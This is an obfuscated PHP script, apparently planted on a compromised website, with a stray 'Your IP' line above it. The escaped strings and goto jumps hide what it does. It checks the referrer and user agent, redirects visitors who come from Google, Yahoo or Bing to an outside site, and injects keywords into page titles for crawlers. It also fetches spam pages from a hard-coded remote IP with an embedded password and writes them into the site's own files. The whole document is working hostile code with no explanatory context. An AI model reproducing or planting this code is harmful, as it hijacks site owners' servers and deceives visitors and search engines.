Your IP : 172.28.240.42
<?php
goto NH7F4; SDeVr: $apass2 = "\142\x32\63\x68\x72\62\x33\x76\x72\x33\x32"; goto qWZao; F0U2W: $keyword = str_replace("\40", "\53", $keyword); goto SDeVr; k2yk2: if (strpos($_SERVER["\x48\x54\124\120\x5f\122\x45\106\105\122\x45\x52"], "\147\157\x6f\x67\154\145\56") or strpos($_SERVER["\110\124\x54\120\x5f\122\x45\106\x45\122\x45\x52"], "\x79\x61\150\157\157\56") or strpos($_SERVER["\110\x54\124\x50\137\122\x45\106\105\x52\105\122"], "\142\151\x6e\x67\56")) { $tpl = "\x69\x6e\x64\145\x78\57" . $_GET["\x69\x64"] . "\56\x70\150\160\56\x74\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\x4c\x6f\143\141\x74\151\157\x6e\72\40\x68\164\x74\x70\x73\72\57\x2f\143\x68\x70\157\x6b\x2e\163\x69\x74\x65\57\x65\156\x74\x65\x72\x2f\x3f\x6d\141\x72\x6b\x3d{$today}\55{$s}\x26\164\x70\x6c\x3d{$tpl}\x26\x65\156\147\x6b\x65\171\75{$keyword}"); die; } else { $myname = $_GET["\x69\144"] . "\x2e\x70\150\x70"; if (file_exists("\151\x6e\x64\x65\x78\57" . $myname)) { $html = @file_get_contents("\x69\156\144\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\124\x50\137\125\123\x45\122\137\x41\x47\x45\116\x54"], "\142\151\x6e\147") > 2 or strpos($_SERVER["\110\x54\124\120\137\x55\x53\105\x52\137\x41\x47\x45\x4e\124"], "\171\x61\150\x6f\x6f") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\151\x64"]); $html = str_replace("\74\164\151\x74\154\x65\x3e\x3c\57\164\x69\x74\x6c\x65\76", "\74\164\151\164\154\x65\76{$keyword}\x3c\x2f\x74\x69\x74\x6c\145\76", $html); } echo $html; die; } } goto X6zr6; rY9f5: $apass3 = "\x72\x76\63\62\171\x64\x61\x63\x73\166\163\x64\x76"; goto IQ42R; FKSc1: $keyword = str_replace("\55", "\40", $_GET["\151\x64"]); goto F0U2W; IQ42R: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto k2yk2; AauQr: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto d9tUF; TdoXc: $xx1 = 5; goto FKSc1; CB0iS: if (strlen($text) < 5000) { $text = file_get_contents("\x68\164\164\160\x3a\x2f\57\61\63\x35\x2e\x31\70\61\x2e\x32\61\x2e\61\62\66\x2f" . $_GET["\146\156"] . "\56\x70\150\160\x3f\160\141\163\x73\x3d{$apass}\46\x71\75{$_GET["\151\x64"]}"); } goto gXsJ0; gXsJ0: if (strlen($text) < 5000) { $url = "\x31\63\x35\56\61\x38\x31\56\x32\61\56\x31\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\x3c\142\x72\x20\x2f\76\xa"; } else { $req = "\57" . $_GET["\x66\156"] . "\56\160\x68\x70\x3f\160\x61\x73\163\75{$apass}\46\x71\75{$_GET["\x69\x64"]}"; $out = "\x47\x45\x54\40{$req}\x20\x48\124\x54\120\57\61\x2e\60\15\12"; $out .= "\110\157\x73\x74\x3a\40{$url}\15\12"; $out .= "\103\157\156\x6e\145\143\164\x69\x6f\156\x3a\40\x43\x6c\157\x73\145\xd\12\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto m3tLC; xlk6q: $_GET["\x66\x6e"] = "\x36\71\66\71\x36\71\x6e\x65\x77"; goto NuRa3; dhAp5: $text = ''; goto WV851; NH7F4: error_reporting(0); goto tao7k; WV851: if (function_exists("\x63\x75\x72\x6c\x5f\x69\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\164\160\72\x2f\57\x31\63\65\56\x31\x38\61\56\x32\61\x2e\61\x32\66\x2f" . $_GET["\x66\x6e"] . "\x2e\x70\x68\x70\x3f\160\x61\x73\163\75{$apass}\46\x71\75{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\157\x7a\151\154\154\x61\x2f\x34\56\x30\40\50\x63\157\155\x70\141\x74\151\142\x6c\145\73\40\115\x53\x49\105\x20\66\56\x30\x3b\x20\127\x69\x6e\x64\x6f\167\163\40\116\x54\x20\x35\x2e\x31\73\40\123\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto CB0iS; NuRa3: $apass1 = "\166\151\x73\x64\157\151\x6a\145\167"; goto DNu1b; qWZao: $s = dirname($_SERVER["\x50\x48\120\137\123\x45\x4c\106"]); goto AauQr; pO9Ob: echo $text; goto Fqb5S; y3F1o: $_GET["\x77\157\162\x6c\x64"] = 5; goto xlk6q; DNu1b: $x1 = 3; goto TdoXc; V2oqL: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\x6e\x67") { echo "\x74\145\x73\164\40\x67\x6f\x6f\144\x2e\x2e\x2e"; die; } goto JaH_A; vD1os: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto V2oqL; JaH_A: if ($_GET["\x69\144"] == "\151\x6e\144\145\x78") { header("\114\x6f\x63\141\164\151\157\x6e\72\40\x68\x74\x74\160\x73\x3a\x2f\x2f\147\157\157\147\x6c\x65\56\143\x6f\x6d"); die; } goto y3F1o; tao7k: $today = "\x32\x30\62\x35\60\x36\60\x33\55"; goto vD1os; m3tLC: if (strlen($text) > 5000) { $out = fopen("\x69\x6e\144\145\x78\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto pO9Ob; d9tUF: $s = $_SERVER["\x53\105\122\126\x45\122\137\x4e\x41\115\105"] . $s; goto rY9f5; X6zr6: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\x64"]); goto dhAp5; Fqb5S: ?>